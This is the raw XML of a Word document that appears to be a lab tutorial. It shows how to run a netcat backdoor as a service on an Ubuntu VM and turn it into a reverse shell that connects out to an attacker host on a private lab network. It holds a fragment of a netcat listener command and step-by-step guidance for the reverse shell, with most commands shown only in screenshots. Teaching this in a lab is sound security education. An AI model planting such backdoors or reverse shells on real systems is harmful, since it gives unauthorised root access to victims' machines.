          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">-k </w:t>
      </w:r>
      <w:r w:rsidRPr="00752DC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-l 127.0.0.1 1234 &gt; /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A15409" w14:textId="6A2DC7F7" w:rsidR="00FD573B" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D4CFB" w14:textId="64D65A44" w:rsidR="00FD573B" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:r>
        <w:t>The method we have used so far allows anyone to connect to the machine and have root shell access.  That could be abused (by someone other than us.)  Why not have the victim machine connect back to our attacker machine instead?  Others cannot abuse our shell, and it has the added advantage that outgoing connections are less likely to be blocked by firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E51C204" w14:textId="2BC526F3" w:rsidR="00FD573B" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:r>
        <w:t>The change is simple:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45740F58" w14:textId="65CF0C0B" w:rsidR="00FD573B" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start a netcat listener on our attacker machine before the service starts on the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530DFC94" w14:textId="4CCECCDE" w:rsidR="00FD573B" w:rsidRDefault="00FD573B" w:rsidP="00FD573B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Change the backdoor.sh script so that nc connects to our attacker instead of listening for connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349641AE" w14:textId="58DDCDCA" w:rsidR="00FD573B" w:rsidRDefault="002936BE" w:rsidP="00FD573B">
      <w:r>
        <w:t xml:space="preserve">Note:  For this example, I am using my Windows host machine as the attacker, and the Ubuntu Linux VM as the victim.  To do this I installed nmap on my Windows host, available at </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="004A7826">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nmap.org/download.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> .  The IP address of the Windows host is 192.168.77.1, and the Ubuntu VM is 192.168.77.129.  For fun, I’ve changed the port number to 4000 (you will probably get a firewall warning the first time you try this—it is ok.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502CA183" w14:textId="087C5568" w:rsidR="002936BE" w:rsidRDefault="002936BE" w:rsidP="002936BE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Start the listener on the attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E5302E" w14:textId="4E20CC7E" w:rsidR="002C31AF" w:rsidRPr="002C31AF" w:rsidRDefault="002C31AF" w:rsidP="002C31AF">
      <w:r>
        <w:t>I’m using the -vv (very verbose) option so ncat will tell me when the victim has connected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B328F" w14:textId="2B9F81D4" w:rsidR="002936BE" w:rsidRDefault="00B959DB" w:rsidP="00FD573B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21445CE9" wp14:editId="7BC60C7A">
            <wp:extent cx="5343525" cy="8220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6808" cy="827201"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A394AD" w14:textId="30A142B9" w:rsidR="002C31AF" w:rsidRDefault="002C31AF" w:rsidP="00FD573B">
      <w:r>
        <w:t>Change the backdoor.sh script on the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF8299" w14:textId="62495AA2" w:rsidR="002C31AF" w:rsidRDefault="002C31AF" w:rsidP="00FD573B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CCE7497" wp14:editId="435F54AE">
            <wp:extent cx="5076825" cy="47161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8703" cy="480153"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3326ED97" w14:textId="6EB2DE3B" w:rsidR="002C31AF" w:rsidRDefault="002C31AF" w:rsidP="00FD573B">
      <w:r>
        <w:t>Remove the -k and -l options from nc, and give it the IP and port of the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F047F95" w14:textId="41F357BE" w:rsidR="002C31AF" w:rsidRDefault="002C31AF" w:rsidP="00FD573B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AF490A8" wp14:editId="39CE7F38">
            <wp:extent cx="5181600" cy="7617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2230" cy="767762"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F79EA0B" w14:textId="48A0D057" w:rsidR="002C31AF" w:rsidRDefault="002C31AF" w:rsidP="00FD573B">
      <w:r>
        <w:t>Restart the backdoor service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C656F3F" w14:textId="0895B275" w:rsidR="002C31AF" w:rsidRDefault="002C31AF" w:rsidP="00FD573B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F932A50" wp14:editId="671F91B3">
            <wp:extent cx="5343525" cy="33579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2019" cy="341984"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EBE66D" w14:textId="7412CDBB" w:rsidR="002C31AF" w:rsidRDefault="00B959DB" w:rsidP="00FD573B">
      <w:r>
        <w:t>Look at the Windows host and see that the victim connected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE7D6D" w14:textId="1B6D2BBF" w:rsidR="00B959DB" w:rsidRDefault="00B959DB" w:rsidP="00FD573B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48E8C70E" wp14:editId="33E9624E">
            <wp:extent cx="5486400" cy="8393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8626" cy="848857"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4633F6F5" w14:textId="11817CC9" w:rsidR="00B959DB" w:rsidRDefault="00B959DB" w:rsidP="00FD573B">
      <w:r>
        <w:t>Enter some commands and see that it is working.  (The commands are underlined in red to make them easier to see.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576A2DBC" w14:textId="619DD00C" w:rsidR="00B959DB" w:rsidRDefault="00B959DB" w:rsidP="00FD573B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4896B900" wp14:editId="170FD741">
            <wp:extent cx="5600700" cy="2460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1575" cy="2469785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&lt;snip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF6005" w14:textId="5CB916C7" w:rsidR="002936BE" w:rsidRDefault="00B959DB" w:rsidP="00FD573B">
      <w:r>
        <w:t>We have a reverse shell!  It is reverse because the victim connected to us instead of the other way around.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488528A2" w14:textId="77777777" w:rsidR="002936BE" w:rsidRDefault="002936BE" w:rsidP="00FD573B"/>
    <w:p w14:paraId="20D1478E" w14:textId="77777777" w:rsidR="002936BE" w:rsidRPr="00FD573B" w:rsidRDefault="002936BE" w:rsidP="00FD573B"/>
    <w:p w14:paraId="0C365080" w14:textId="77777777" w:rsidR="00FD573B" w:rsidRDefault="00FD573B" w:rsidP="007C0818">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C276101" w14:textId="77777777" w:rsidR="00686B6D" w:rsidRPr="007C0818" w:rsidRDefault="00686B6D" w:rsidP="007C0818">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00686B6D" w:rsidRPr="007C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87453"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0CA0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7"/>
    <w:rsid w:val="001B6C17"/>
    <w:rsid w:val="002936BE"/>
    <w:rsid w:val="002C31AF"/>
    <w:rsid w:val="002F4B62"/>
    <w:rsid w:val="003076FB"/>
    <w:rsid w:val="00373B11"/>
    <w:rsid w:val="003F5151"/>
    <w:rsid w:val="004E4752"/>
    <w:rsid w:val="0050462B"/>
    <w:rsid w:val="00560790"/>
    <w:rsid w:val="00686B6D"/>
    <w:rsid w:val="00734D85"/>
    <w:rsid w:val="007446C3"/>
    <w:rsid w:val="00746CA5"/>
    <w:rsid w:val="00752DC6"/>
    <w:rsid w:val="007C0818"/>
    <w:rsid w:val="00865BFA"/>
    <w:rsid w:val="00976502"/>
    <w:rsid w:val="00A77E33"/>
    <w:rsid w:val="00A92EF6"/>
    <w:rsid w:val="00AA25BA"/>
    <w:rsid w:val="00AD78A5"/>
    <w:rsid w:val="00B959DB"/>
    <w:rsid w:val="00BA1C24"/>
    <w:rsid w:val="00C55EFF"/>
    <w:rsid w:val="00DA3EB3"/>
    <w:rsid w:val="00DB747E"/>
    <w:rsid w:val="00FD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A388"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{72BC6797-0BD8-4F84-BB96-888BF30C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6C17"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B6C17"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FD57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573B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002936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shellhacks.com/systemd-service-file-exampl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archive.org/web/20130627142420/https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-proble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hyperlink" Target="https://medium.com/@airman604/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c"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www.sans.org/blog/sans-cheat-sheet-netcat/"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nmap.org/nca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map.org/download.html" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Netca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2020-09-11T20:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-30T20:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>